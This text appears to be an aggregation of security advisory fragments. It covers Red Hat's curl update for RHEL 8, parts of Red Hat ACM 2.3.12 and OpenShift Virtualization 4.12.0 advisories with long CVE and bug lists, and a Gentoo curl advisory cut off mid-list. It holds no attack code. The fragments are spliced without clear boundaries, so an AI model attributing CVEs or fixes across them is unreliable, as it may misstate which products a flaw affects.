releases/architectures:\n\nRed Hat Enterprise Linux BaseOS (v. 8) - aarch64, ppc64le, s390x, x86_64\n\n3. Description:\n\nThe curl packages provide the libcurl library and the curl utility for\ndownloading files from servers using various protocols, including HTTP,\nFTP, and LDAP. \n\nSecurity Fix(es):\n\n* curl: HTTP compression denial of service (CVE-2022-32206)\n\n* curl: FTP-KRB bad message verification (CVE-2022-32208)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n4. 
Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n2099300 - CVE-2022-32206 curl: HTTP compression denial of service\n2099306 - CVE-2022-32208 curl: FTP-KRB bad message verification\n\n6. Package List:\n\nRed Hat Enterprise Linux BaseOS (v. 8):\n\nSource:\ncurl-7.61.1-22.el8_6.4.src.rpm\n\naarch64:\ncurl-7.61.1-22.el8_6.4.aarch64.rpm\ncurl-debuginfo-7.61.1-22.el8_6.4.aarch64.rpm\ncurl-debugsource-7.61.1-22.el8_6.4.aarch64.rpm\ncurl-minimal-debuginfo-7.61.1-22.el8_6.4.aarch64.rpm\nlibcurl-7.61.1-22.el8_6.4.aarch64.rpm\nlibcurl-debuginfo-7.61.1-22.el8_6.4.aarch64.rpm\nlibcurl-devel-7.61.1-22.el8_6.4.aarch64.rpm\nlibcurl-minimal-7.61.1-22.el8_6.4.aarch64.rpm\nlibcurl-minimal-debuginfo-7.61.1-22.el8_6.4.aarch64.rpm\n\nppc64le:\ncurl-7.61.1-22.el8_6.4.ppc64le.rpm\ncurl-debuginfo-7.61.1-22.el8_6.4.ppc64le.rpm\ncurl-debugsource-7.61.1-22.el8_6.4.ppc64le.rpm\ncurl-minimal-debuginfo-7.61.1-22.el8_6.4.ppc64le.rpm\nlibcurl-7.61.1-22.el8_6.4.ppc64le.rpm\nlibcurl-debuginfo-7.61.1-22.el8_6.4.ppc64le.rpm\nlibcurl-devel-7.61.1-22.el8_6.4.ppc64le.rpm\nlibcurl-minimal-7.61.1-22.el8_6.4.ppc64le.rpm\nlibcurl-minimal-debuginfo-7.61.1-22.el8_6.4.ppc64le.rpm\n\ns390x:\ncurl-7.61.1-22.el8_6.4.s390x.rpm\ncurl-debuginfo-7.61.1-22.el8_6.4.s390x.rpm\ncurl-debugsource-7.61.1-22.el8_6.4.s390x.rpm\ncurl-minimal-debuginfo-7.61.1-22.el8_6.4.s390x.rpm\nlibcurl-7.61.1-22.el8_6.4.s390x.rpm\nlibcurl-debuginfo-7.61.1-22.el8_6.4.s390x.rpm\nlibcurl-devel-7.61.1-22.el8_6.4.s390x.rpm\nlibcurl-minimal-7.61.1-22.el8_6.4.s390x.rpm\nlibcurl-minimal-debuginfo-7.61.1-22.el8_6.4.s390x.rpm\n\nx86_64:\ncurl-7.61.1-22.el8_6.4.x86_64.rpm\ncurl-debuginfo-7.61.1-22.el8_6.4.i686.rpm\ncurl-debuginfo-7.61.1-22.el8_6.4.x86_64.rpm\ncurl-debugsource-7.61.1-22.el8_6.4.i686.rpm\ncurl-debugsource-7.61.1-22.el8_6.4.x86_64.rpm\ncurl-minimal-debuginfo-7.61.1-22.el8_6.4.
i686.rpm\ncurl-minimal-debuginfo-7.61.1-22.el8_6.4.x86_64.rpm\nlibcurl-7.61.1-22.el8_6.4.i686.rpm\nlibcurl-7.61.1-22.el8_6.4.x86_64.rpm\nlibcurl-debuginfo-7.61.1-22.el8_6.4.i686.rpm\nlibcurl-debuginfo-7.61.1-22.el8_6.4.x86_64.rpm\nlibcurl-devel-7.61.1-22.el8_6.4.i686.rpm\nlibcurl-devel-7.61.1-22.el8_6.4.x86_64.rpm\nlibcurl-minimal-7.61.1-22.el8_6.4.i686.rpm\nlibcurl-minimal-7.61.1-22.el8_6.4.x86_64.rpm\nlibcurl-minimal-debuginfo-7.61.1-22.el8_6.4.i686.rpm\nlibcurl-minimal-debuginfo-7.61.1-22.el8_6.4.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2022-32206\nhttps://access.redhat.com/security/cve/CVE-2022-32208\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2022 Red Hat, Inc. 
\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYwa9b9zjgjWX9erEAQi1rQ/+Kw4R4cPAIlGUx4vJwSMw8zwCDxnLviV+\nYgCpaCuUwCkWI9hrAQNC1O5i2MSl7j8jI9dt0Oe770VwNIZPzJMK8MX96zYdeOsg\nEiuwTW5KTWKwCeAvPt6ydVji9R0N7FMDBxmdi1aE8gBt8J6pIwp4ozrR4jXiXCjB\ndQJlc2kf7YXDiengte1jpXNCFh2ar9t8lqmW53Hu05zR8VFdAPk6NM1kTIploICN\nblR9t80TbWouBvN2A6gIZ0ZWnbJOY9odCBHdo5ay8kufmQC0K9QKb7jyoaUUHVau\n5/HVbncd7bFQuyu+yGoOxU1TCxwee3B9LAmR4uzDdJcaTxPgvK2cyskdTVz+9N9k\nnJLDYGaL7UNC7YkbByN58VC6fdGsnn8QIXHg7ICTgdhYiPZ3uP5JUiDrAGKKb/v+\nXPtwYHuh6yX0OfS0JqFEMjR0P1rFLiuDNBOPBDiTV2mBVd+7kiNTs1izUDGwQeFd\nVaNNNU4kpD3FGOgRwxIAKz2qCX+Ody8goBeJJPGcVlmDp025ZrMisl1QC8/3eTas\nML+TSvTeaSY/I35uPzKsoh1f+/lAwUsB54I6NxHH3vWYryievuSdpjtNsQInACjw\nowX+pU5CfOwdD56Hqdhb7fjuJVufo6VC8b0zy/vSZYnNt0cfojXA73F3B1K5+XcF\nbBkTeh+fqsg=powM\n-----END PGP SIGNATURE-----\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Description:\n\nRed Hat Advanced Cluster Management for Kubernetes 2.3.12 images\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in. See the following\nRelease Notes documentation, which will be updated shortly for this\nrelease, for additional details about this release:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/\n\nSecurity fix:\n\n* CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS\n\nBug fixes:\n\n* Remove 1.9.1 from Proxy Patch Documentation (BZ# 2076856)\n\n* RHACM 2.3.12 images (BZ# 2101411)\n\n3. 
Bugs fixed (https://bugzilla.redhat.com/):\n\n2076856 - [doc] Remove 1.9.1 from Proxy Patch Documentation\n2101411 - RHACM 2.3.12 images\n2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS\n\n5. Description:\n\nOpenShift Virtualization is Red Hat\u0027s virtualization solution designed for\nRed Hat OpenShift Container Platform. This advisory contains the following\nOpenShift Virtualization 4.12.0 images:\n\nSecurity Fix(es):\n\n* golang: net/http: limit growth of header canonicalization cache\n(CVE-2021-44716)\n\n* kubeVirt: Arbitrary file read on the host from KubeVirt VMs\n(CVE-2022-1798)\n\n* golang: out-of-bounds read in golang.org/x/text/language leads to DoS\n(CVE-2021-38561)\n\n* golang: syscall: don\u0027t close fd 0 on ForkExec error (CVE-2021-44717)\n\n* golang: net/http: improper sanitization of Transfer-Encoding header\n(CVE-2022-1705)\n\n* golang: go/parser: stack exhaustion in all Parse* functions\n(CVE-2022-1962)\n\n* golang: math/big: uncontrolled memory consumption due to an unhandled\noverflow via Rat.SetString (CVE-2022-23772)\n\n* golang: cmd/go: misinterpretation of branch names can lead to incorrect\naccess control (CVE-2022-23773)\n\n* golang: crypto/elliptic: IsOnCurve returns true for invalid field\nelements (CVE-2022-23806)\n\n* golang: encoding/xml: stack exhaustion in Decoder.Skip (CVE-2022-28131)\n\n* golang: syscall: faccessat checks wrong group (CVE-2022-29526)\n\n* golang: io/fs: stack exhaustion in Glob (CVE-2022-30630)\n\n* golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)\n\n* golang: path/filepath: stack exhaustion in Glob (CVE-2022-30632)\n\n* golang: encoding/xml: stack exhaustion in Unmarshal (CVE-2022-30633)\n\n* golang: encoding/gob: stack exhaustion in Decoder.Decode (CVE-2022-30635)\n\n* golang: net/http/httputil: NewSingleHostReverseProxy - omit\nX-Forwarded-For not working (CVE-2022-32148)\n\n* golang: crypto/tls: session tickets lack random 
ticket_age_add\n(CVE-2022-30629)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nRHEL-8-CNV-4.12\n\n=============\nbridge-marker-container-v4.12.0-24\ncluster-network-addons-operator-container-v4.12.0-24\ncnv-containernetworking-plugins-container-v4.12.0-24\ncnv-must-gather-container-v4.12.0-58\nhco-bundle-registry-container-v4.12.0-769\nhostpath-csi-driver-container-v4.12.0-30\nhostpath-provisioner-container-v4.12.0-30\nhostpath-provisioner-operator-container-v4.12.0-31\nhyperconverged-cluster-operator-container-v4.12.0-96\nhyperconverged-cluster-webhook-container-v4.12.0-96\nkubemacpool-container-v4.12.0-24\nkubevirt-console-plugin-container-v4.12.0-182\nkubevirt-ssp-operator-container-v4.12.0-64\nkubevirt-tekton-tasks-cleanup-vm-container-v4.12.0-55\nkubevirt-tekton-tasks-copy-template-container-v4.12.0-55\nkubevirt-tekton-tasks-create-datavolume-container-v4.12.0-55\nkubevirt-tekton-tasks-create-vm-from-template-container-v4.12.0-55\nkubevirt-tekton-tasks-disk-virt-customize-container-v4.12.0-55\nkubevirt-tekton-tasks-disk-virt-sysprep-container-v4.12.0-55\nkubevirt-tekton-tasks-modify-vm-template-container-v4.12.0-55\nkubevirt-tekton-tasks-operator-container-v4.12.0-40\nkubevirt-tekton-tasks-wait-for-vmi-status-container-v4.12.0-55\nkubevirt-template-validator-container-v4.12.0-32\nlibguestfs-tools-container-v4.12.0-255\novs-cni-marker-container-v4.12.0-24\novs-cni-plugin-container-v4.12.0-24\nvirt-api-container-v4.12.0-255\nvirt-artifacts-server-container-v4.12.0-255\nvirt-cdi-apiserver-container-v4.12.0-72\nvirt-cdi-cloner-container-v4.12.0-72\nvirt-cdi-controller-container-v4.12.0-72\nvirt-cdi-importer-container-v4.12.0-72\nvirt-cdi-operator-container-v4.12.0-72\nvirt-cdi-uploadproxy-container-v4.12.0-71\nvirt-cdi-uploadserver-container-v4.12.0-72\nvirt-controller-container-v4.12.0-255\nvirt-exportproxy-contain
er-v4.12.0-255\nvirt-exportserver-container-v4.12.0-255\nvirt-handler-container-v4.12.0-255\nvirt-launcher-container-v4.12.0-255\nvirt-operator-container-v4.12.0-255\nvirtio-win-container-v4.12.0-10\nvm-network-latency-checkup-container-v4.12.0-89\n\n3. Bugs fixed (https://bugzilla.redhat.com/):\n\n1719190 - Unable to cancel live-migration if virt-launcher pod in pending state\n2023393 - [CNV] [UI]Additional information needed for cloning when default storageclass in not defined in target datavolume\n2030801 - CVE-2021-44716 golang: net/http: limit growth of header canonicalization cache\n2030806 - CVE-2021-44717 golang: syscall: don\u0027t close fd 0 on ForkExec error\n2040377 - Unable to delete failed VMIM after VM deleted\n2046298 - mdevs not configured with drivers installed, if mdev config added to HCO CR before drivers are installed\n2052556 - Metric \"kubevirt_num_virt_handlers_by_node_running_virt_launcher\" reporting incorrect value\n2053429 - CVE-2022-23806 golang: crypto/elliptic: IsOnCurve returns true for invalid field elements\n2053532 - CVE-2022-23772 golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString\n2053541 - CVE-2022-23773 golang: cmd/go: misinterpretation of branch names can lead to incorrect access control\n2060499 - [RFE] Cannot add additional service (or other objects) to VM template\n2069098 - Large scale |VMs migration is slow due to low migration parallelism\n2070366 - VM Snapshot Restore hangs indefinitely when backed by a snapshotclass\n2071491 - Storage Throughput metrics are incorrect in Overview\n2072797 - Metrics in Virtualization -\u003e Overview period is not clear or configurable\n2072821 - Top Consumers of Storage Traffic in Kubevirt Dashboard giving unexpected numbers\n2079916 - KubeVirt CR seems to be in DeploymentInProgress state and not recovering\n2084085 - CVE-2022-29526 golang: syscall: faccessat checks wrong group\n2086285 - [dark mode] VirtualMachine - in the Utilization card 
the percentages and the graphs not visible enough in dark mode\n2086551 - Min CPU feature found in labels\n2087724 - Default template show no boot source even there are auto-upload boot sources\n2088129 - [SSP] webhook does not comply with restricted security context\n2088464 - [CDI] cdi-deployment does not comply with restricted security context\n2089391 - Import gzipped raw file causes image to be downloaded and uncompressed to TMPDIR\n2089744 - HCO should label its control plane namespace to admit pods at privileged security level\n2089751 - 4.12.0 containers\n2089804 - 4.12.0 rpms\n2091856 - ?Edit BootSource? action should have more explicit information when disabled\n2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add\n2092796 - [RFE] CPU|Memory display in the template card is not consistent with the display in the template drawer\n2093771 - The disk source should be PVC if the template has no auto-update boot source\n2093996 - kubectl get vmi API should always return primary interface if exist\n2094202 - Cloud-init username field should have hint\n2096285 - KubeVirt CR API documentation is missing docs for many fields\n2096780 - [RFE] Add ssh-key and sysprep to template scripts tab\n2097436 - Online disk expansion ignores filesystem overhead change\n2097586 - AccessMode should stay on ReadWriteOnce while editing a disk with storage class HPP\n2099556 - [RFE] Add option to enable RDP service for windows vm\n2099573 - [RFE] Improve template\u0027s message about not editable\n2099923 - [RFE] Merge \"SSH access\" and \"SSH command\" into one\n2100290 - Error is not dismissed on catalog review page\n2100436 - VM list filtering ignores VMs in error-states\n2100442 - [RFE] allow enabling and disabling SSH service while VM is shut down\n2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS\n2100629 - Update nested support KBASE article\n2100679 - The number of hardware devices is not correct 
in vm overview tab\n2100682 - All hardware devices get deleted while just delete one\n2100684 - Workload profile are not editable during creation and after creation\n2101144 - VM filter has two \"Other\" checkboxes which are triggered together\n2101164 - [dark mode] Number of alerts in Alerts card not visible enough in dark mode\n2101167 - Edit buttons clickable area is too large. \n2101333 - [e2e] elements on Template Scheduling tab are missing proper data-test-id\n2101335 - Clone action enabled in VM list kebab button for a VM in CrashLoopBackOff state\n2101390 - Easy to miss the \"tick\" when adding GPU device to vm via UI\n2101394 - [e2e] elements on VM Scripts tab are missing proper data-test-id\n2101423 - wrong user name on using ignition\n2101430 - Using CLOUD_USER_PASSWORD in Templates parameters breaks VM review page\n2101445 - \"Pending changes - Boot Order\"\n2101454 - Cannot add PVC boot source to template in \u0027Edit Boot Source Reference\u0027 view as a non-priv user\n2101499 - Cannot add NIC to VM template as non-priv user\n2101501 - NAME parameter in VM template has no effect. 
\n2101628 - non-priv user cannot load dataSource while edit template\u0027s rootdisk\n2101667 - VMI view is not aligned with vm and tempates\n2101681 - All templates are labeling \"source available\" in template list page\n2102074 - VM Creation time on VM Overview Details card lacks string\n2102125 - vm clone modal is displaying DV size instead of PVC size\n2102132 - align the utilization card of single VM overview with the design\n2102138 - Should the word \"new\" be removed from \"Create new VirtualMachine from catalog\"?\n2102256 - Add button moved to right\n2102448 - VM disk is deleted by uncheck \"Delete disks (1x)\" on delete modal\n2102475 - Template \u0027vm-template-example\u0027 should be filtered by \u0027Fedora\u0027 rather than \u0027Other\u0027\n2102561 - sysprep-info should link to downstream doc\n2102737 - Clone a VM should lead to vm overview tab\n2102740 - \"Save\" button on vm clone modal should be \"Clone\"\n2103806 - \"404: Not Found\" appears shortly by clicking the PVC link on vm disk tab\n2103807 - PVC is not named by VM name while creating vm quickly\n2103817 - Workload profile values in vm details should align with template\u0027s value\n2103844 - VM nic model is empty\n2104331 - VM list page scroll up automatically\n2104402 - VM create button is not enabled while adding multiple environment disks\n2104422 - Storage status report \"OpenShift Data Foundation is not available\" even the operator is installed\n2104424 - Enable descheduler or hide it on template\u0027s scheduling tab\n2104479 - [4.12] Cloned VM\u0027s snapshot restore fails if the source VM disk is deleted\n2104480 - Alerts in VM overview tab disappeared after a few seconds\n2104785 - \"Add disk\" and \"Disks\" are on the same line\n2104859 - [RFE] Add \"Copy SSH command\" to VM action list\n2105257 - Can\u0027t set log verbosity level for virt-operator pod\n2106175 - All pages are crashed after visit Virtualization -\u003e Overview\n2106963 - Cannot add configmap for windows 
VM\n2107279 - VM Template\u0027s bootable disk can be marked as bootable\n2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read\n2107371 - CVE-2022-30630 golang: io/fs: stack exhaustion in Glob\n2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header\n2107376 - CVE-2022-1962 golang: go/parser: stack exhaustion in all Parse* functions\n2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working\n2107386 - CVE-2022-30632 golang: path/filepath: stack exhaustion in Glob\n2107388 - CVE-2022-30635 golang: encoding/gob: stack exhaustion in Decoder.Decode\n2107390 - CVE-2022-28131 golang: encoding/xml: stack exhaustion in Decoder.Skip\n2107392 - CVE-2022-30633 golang: encoding/xml: stack exhaustion in Unmarshal\n2108339 - datasource does not provide timestamp when updated\n2108638 - When chosing a vm or template while in all-namespace, and returning to list, namespace is changed\n2109818 - Upstream metrics documentation is not detailed enough\n2109975 - DataVolume fails to import \"cirros-container-disk-demo\" image\n2110256 - Storage -\u003e PVC -\u003e upload data, does not support source reference\n2110562 - CNV introduces a compliance check fail in \"ocp4-moderate\" profile - routes-protected-by-tls\n2111240 - GiB changes to B in Template\u0027s Edit boot source reference modal\n2111292 - kubevirt plugin console is crashed after creating a vm with 2 nics\n2111328 - kubevirt plugin console crashed after visit vmi page\n2111378 - VM SSH command generated by UI points at api VIP\n2111744 - Cloned template should not label `app.kubernetes.io/name: common-templates`\n2111794 - the virtlogd process is taking too much RAM! 
(17468Ki \u003e 17Mi)\n2112900 - button style are different\n2114516 - Nothing happens after clicking on Fedora cloud image list link\n2114636 - The style of displayed items are not unified on VM tabs\n2114683 - VM overview tab is crashed just after the vm is created\n2115257 - Need to Change system-product-name to \"OpenShift Virtualization\" in CNV-4.12\n2115258 - The storageclass of VM disk is different from quick created and customize created after changed the default storageclass\n2115280 - [e2e] kubevirt-e2e-aws see two duplicated navigation items\n2115769 - Machine type is updated to rhel8.6.0 in KV CR but not in Templates\n2116225 - The filter keyword of the related operator \u0027Openshift Data Foundation\u0027 is \u0027OCS\u0027 rather than \u0027ODF\u0027\n2116644 - Importer pod is failing to start with error \"MountVolume.SetUp failed for volume \"cdi-proxy-cert-vol\" : configmap \"custom-ca\" not found\"\n2117549 - Cannot edit cloud-init data after add ssh key\n2117803 - Cannot edit ssh even vm is stopped\n2117813 - Improve descriptive text of VM details while VM is off\n2117872 - CVE-2022-1798 kubeVirt: Arbitrary file read on the host from KubeVirt VMs\n2118257 - outdated doc link tolerations modal\n2118823 - Deprecated API 1.25 call: virt-cdi-controller/v0.0.0 (linux/amd64) kubernetes/$Format\n2119069 - Unable to start windows VMs on PSI setups\n2119128 - virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24\n2119309 - readinessProbe in VM stays on failed\n2119615 - Change the disk size causes the unit changed\n2120907 - Cannot filter disks by label\n2121320 - Negative values in migration metrics\n2122236 - Failing to delete HCO with SSP sticking around\n2122990 - VMExport should check APIGroup\n2124147 - \"ReadOnlyMany\" should not be added to supported values in memory dump\n2124307 - Ui crash/stuck on loading when trying to detach disk on a VM\n2124528 - On upgrade, when live-migration is failed due to an infra issue, 
virt-handler continuously and endlessly tries to migrate it\n2124555 - View documentation link on MigrationPolicies page des not work\n2124557 - MigrationPolicy description is not displayed on Details page\n2124558 - Non-privileged user can start MigrationPolicy creation\n2124565 - Deleted DataSource reappears in list\n2124572 - First annotation can not be added to DataSource\n2124582 - Filtering VMs by OS does not work\n2124594 - Docker URL validation is inconsistent over application\n2124597 - Wrong case in Create DataSource menu\n2126104 - virtctl image-upload hangs waiting for pod to be ready with missing access mode defined in the storage profile\n2126397 - many KubeVirtComponentExceedsRequestedMemory alerts in Firing state\n2127787 - Expose the PVC source of the dataSource on UI\n2127843 - UI crashed by selecting \"Live migration network\"\n2127931 - Change default time range on Virtualization -\u003e Overview -\u003e Monitoring dashboard to 30 minutes\n2127947 - cluster-network-addons-config tlsSecurityProfle takes a long time to update after setting APIServer\n2128002 - Error after VM template deletion\n2128107 - sriov-manage command fails to enable SRIOV Virtual functions on the Ampere GPU Cards\n2128872 - [4.11]Can\u0027t restore cloned VM\n2128948 - Cannot create DataSource from default YAML\n2128949 - Cannot create MigrationPolicy from example YAML\n2128997 - [4.11.1]virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24\n2129013 - Mark Windows 11 as TechPreview\n2129234 - Service is not deleted along with the VM when the VM is created from a template with service\n2129301 - Cloud-init network data don\u0027t wipe out on uncheck checkbox \u0027Add network data\u0027\n2129870 - crypto-policy : Accepting TLS 1.3 connections by validating webhook\n2130509 - Auto image import in failed state with data sources pointing to external manually-created PVC/DV\n2130588 - crypto-policy : Common Ciphers support by apiserver and hco\n2130695 
- crypto-policy : Logging Improvement and publish the source of ciphers\n2130909 - Non-privileged user can start DataSource creation\n2131157 - KV data transfer rate chart in VM Metrics tab is not displayed\n2131165 - [dark mode] Additional statuses accordion on Virtualization Overview page not visible enough\n2131674 - Bump virtlogd memory requirement to 20Mi\n2132031 - Ensure Windows 2022 Templates are marked as TechPreview like it is done now for Windows 11\n2132682 - Default YAML entity name convention. \n2132721 - Delete dialogs\n2132744 - Description text is missing in Live Migrations section\n2132746 - Background is broken in Virtualization Monitoring page\n2132783 - VM can not be created from Template with edited boot source\n2132793 - Edited Template BSR is not saved\n2132932 - Typo in PVC size units menu\n2133540 - [pod security violation audit] Audit violation in \"cni-plugins\" container should be fixed\n2133541 - [pod security violation audit] Audit violation in \"bridge-marker\" container should be fixed\n2133542 - [pod security violation audit] Audit violation in \"manager\" container should be fixed\n2133543 - [pod security violation audit] Audit violation in \"kube-rbac-proxy\" container should be fixed\n2133655 - [pod security violation audit] Audit violation in \"cdi-operator\" container should be fixed\n2133656 - [4.12][pod security violation audit] Audit violation in \"hostpath-provisioner-operator\" container should be fixed\n2133659 - [pod security violation audit] Audit violation in \"cdi-controller\" container should be fixed\n2133660 - [pod security violation audit] Audit violation in \"cdi-source-update-poller\" container should be fixed\n2134123 - KubeVirtComponentExceedsRequestedMemory Alert for virt-handler pod\n2134672 - [e2e] add data-test-id for catalog -\u003e storage section\n2134825 - Authorization for expand-spec endpoint missing\n2135805 - Windows 2022 template is missing vTPM and UEFI params in spec\n2136051 - Name jumping 
when trying to create a VM with source from catalog\n2136425 - Windows 11 is detected as Windows 10\n2136534 - Not possible to specify a TTL on VMExports\n2137123 - VMExport: export pod is not PSA complaint\n2137241 - Checkbox about delete vm disks is not loaded while deleting VM\n2137243 - registery input add docker prefix twice\n2137349 - \"Manage source\" action infinitely loading on DataImportCron details page\n2137591 - Inconsistent dialog headings/titles\n2137731 - Link of VM status in overview is not working\n2137733 - No link for VMs in error status in \"VirtualMachine statuses\" card\n2137736 - The column name \"MigrationPolicy name\" can just be \"Name\"\n2137896 - crypto-policy: HCO should pick TLSProfile from apiserver if not provided explicitly\n2138112 - Unsupported S3 endpoint option in Add disk modal\n2138119 - \"Customize VirtualMachine\" flow is not user-friendly because settings are split into 2 modals\n2138199 - Win11 and Win22 templates are not filtered properly by Template provider\n2138653 - Saving Template prameters reloads the page\n2138657 - Setting DATA_SOURCE_* Template parameters makes VM creation fail\n2138664 - VM that was created with SSH key fails to start\n2139257 - Cannot add disk via \"Using an existing PVC\"\n2139260 - Clone button is disabled while VM is running\n2139293 - Non-admin user cannot load VM list page\n2139296 - Non-admin cannot load MigrationPolicies page\n2139299 - No auto-generated VM name while creating VM by non-admin user\n2139306 - Non-admin cannot create VM via customize mode\n2139479 - virtualization overview crashes for non-priv user\n2139574 - VM name gets \"emptyname\" if click the create button quickly\n2139651 - non-priv user can click create when have no permissions\n2139687 - catalog shows template list for non-priv users\n2139738 - [4.12]Can\u0027t restore cloned VM\n2139820 - non-priv user cant reach vm details\n2140117 - Provide upgrade path from 4.11.1-\u003e4.12.0\n2140521 - Click the breadcrumb 
list about \"VirtualMachines\" goes to undefined project\n2140534 - [View only] it should give a permission error when user clicking the VNC play/connect button as a view only user\n2140627 - Not able to select storageClass if there is no default storageclass defined\n2140730 - Links on Virtualization Overview page lead to wrong namespace for non-priv user\n2140808 - Hyperv feature set to \"enabled: false\" prevents scheduling\n2140977 - Alerts number is not correct on Virtualization overview\n2140982 - The base template of cloned template is \"Not available\"\n2140998 - Incorrect information shows in overview page per namespace\n2141089 - Unable to upload boot images. \n2141302 - Unhealthy states alerts and state metrics are missing\n2141399 - Unable to set TLS Security profile for CDI using HCO jsonpatch annotations\n2141494 - \"Start in pause mode\" option is not available while creating the VM\n2141654 - warning log appearing on VMs: found no SR-IOV networks\n2141711 - Node column selector is redundant for non-priv user\n2142468 - VM action \"Stop\" should not be disabled when VM in pause state\n2142470 - Delete a VM or template from all projects leads to 404 error\n2142511 - Enhance alerts card in overview\n2142647 - Error after MigrationPolicy deletion\n2142891 - VM latency checkup: Failed to create the checkup\u0027s Job\n2142929 - Permission denied when try get instancestypes\n2143268 - Topolvm storageProfile missing accessModes and volumeMode\n2143498 - Could not load template while creating VM from catalog\n2143964 - Could not load template while creating VM from catalog\n2144580 - \"?\" icon is too big in VM Template Disk tab\n2144828 - \"?\" icon is too big in VM Template Disk tab\n2144839 - Alerts number is not correct on Virtualization overview\n2153849 - After upgrade to 4.11.1-\u003e4.12.0 hco.spec.workloadUpdateStrategy value is getting overwritten\n2155757 - Incorrect upstream-version label \"v1.6.0-unstable-410-g09ea881c\" is tagged to 4.12 
hyperconverged-cluster-operator-container and hyperconverged-cluster-webhook-container\n\n5. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 202212-01\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: High\n Title: curl: Multiple Vulnerabilities\n Date: December 19, 2022\n Bugs: #803308, #813270, #841302, #843824, #854708, #867679, #878365\n ID: 202212-01\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n=======\nMultiple vulnerabilities have been found in curl, the worst of which\ncould result in arbitrary code execution. \n\nBackground\n=========\nA command line tool and library for transferring data with URLs. \n\nAffected packages\n================\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-misc/curl \u003c 7.86.0 \u003e= 7.86.0\n\nDescription\n==========\nMultiple vulnerabilities have been discovered in curl. Please review the\nCVE identifiers referenced below for details. \n\nImpact\n=====\nPlease review the referenced CVE identifiers for details. \n\nWorkaround\n=========\nThere is no known workaround at this time. 
\n\nResolution\n=========\nAll curl users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-misc/curl-7.86.0\"\n\nReferences\n=========\n[ 1 ] CVE-2021-22922\n https://nvd.nist.gov/vuln/detail/CVE-2021-22922\n[ 2 ] CVE-2021-22923\n https://nvd.nist.gov/vuln/detail/CVE-2021-22923\n[ 3 ] CVE-2021-22925\n https://nvd.nist.gov/vuln/detail/CVE-2021-22925\n[ 4 ] CVE-2021-22926\n https://nvd.nist.gov/vuln/detail/CVE-2021-22926\n[ 5 ] CVE-2021-22945\n https://nvd.nist.gov/vuln/detail/CVE-2021-22945\n[ 6 ] CVE-2021-22946\n https://nvd.nist.gov/vuln/detail/CVE-2021-22946\n[ 7 ] CVE-2021-22947\n https://nvd.nist.gov/vuln/detail/CVE-2021-22947\n[ 8 ] CVE-2022-22576\n https://nvd.nist.gov/vuln/detail/CVE-2022-22576\n[ 9 ] CVE-2022-27774\n https://nvd.nist.gov/vuln/detail/CVE-2022-27774\n[ 10 ] CVE-2022-27775\n https://nvd.nist.gov/vuln/detail/CVE-2022-27775\n[ 11 ] CVE-2022-27776\n https://nvd.nist.gov/vuln/detail/CVE-2022-27776\n[ 12 ] CVE-2022-27779\n https://nvd.nist.gov/vuln/detail/CVE-2022-27779\n[ 13 ] CVE-2022-27780\n https://nvd.nist.gov/vuln/detail/CVE-2022-27780\n[ 14 ] CVE-2022-27781\n https://nvd.nist.gov/vuln/detail/CVE-2022-27781\n[ 15 ] CVE-2022-27782\n https://nvd.nist.gov/vuln/detail/CVE-2022-27782\n[ 16 ] CVE-2022-30115\n https://nvd.nist.gov/vuln/detail/CVE-2022-30115\n[ 17 ] CVE-2022-32205\n https://nvd.nist.gov/vuln/detail/CVE-2022-32205\n[ 18 ] CVE-2022-32206\n https://nvd.nist.gov/vuln/detail/CVE-2022-32206\n[ 19 ] CVE-2022-32207\n https://nvd.nist.gov/vuln/detail/CVE-2022-32207\n[ 20 ] CVE-2022-32208\n https://nvd.nist.gov/vuln/detail/CVE-2022-32208\n[ 21 ] CVE-2022-32221\n https://nvd.nist.gov/vuln/detail/CVE-2022-32221\n[ 22 ] CVE-2022-35252\n https://nvd.nist.gov/vuln/detail/CVE-2022-35252\n[ 23 ] CVE-2022-35260\n https://nvd.nist.gov/vuln/detail/CVE-2022-35260\n[ 24 ] 